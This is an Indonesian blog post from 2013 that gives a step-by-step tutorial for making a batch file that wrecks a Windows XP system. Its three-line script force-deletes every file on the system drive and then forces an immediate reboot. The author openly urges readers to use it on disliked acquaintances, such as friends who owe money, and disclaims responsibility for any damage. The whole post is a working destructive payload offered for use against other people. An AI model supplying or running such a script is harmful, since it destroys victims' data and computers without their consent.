Sunday 19 May 2013

Cara Merusak Sistem Windows XP Dengan Notepad

TEKNIK KOMPUTER DAN JARINGAN - Apa kabar sobat TKJ di sini saya akan share sebuah trick jail atau bisa dibilang jahat karena trick ini sifatnya merusak dan merugikan orang lain.

Cara Merusak System Windows XP dengan Notepad
Microsoft Windows XP
Apabila kalian punya teman atau kenalan yang kurang kalian sukai, mungkin karena dia suka pinjem duit ke kalian, suka telat bayar utang dll :p coba kalian pake cara ini buat ngerjain ( kalo dia punya PC )
Trick ini sebenarnya sangatlah simple, kalian cukup menggunakan notepad dan imajinasi kalian. Berikut cara merusak system windows xp dengan notepad.
Tutorial :
1). Buka notepad lalu copy-paste script dibawah ini :
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

2). Simpan dengan extensi .bat

Cara menggunakannya cukup dengan Double-click pada file yang sudah kalian buat tadi, dan jangan heran kalo komputer/laptop kalian akan mati dan saya juga kurang tau bagaimana cara mengatasi windows xp yang sudah dirusak oleh notepad ber-script ini :p

Saya tidak bertanggung jawab apabila terjadi kerusakan pada komputer atau laptop!

Jalan terakhir untuk mengembalikan komputer/laptop yang mati ini mungkin adalah Install ulang =)) Jadi kalian pikirin baik-baik untuk tidak mencobanya di Komputer atau Laptop pribadi.

Sekian postingan saya kali ini yang membahas tentang Cara Merusak System Windows XP dengan Notepad, semoga dapat bermanfaat.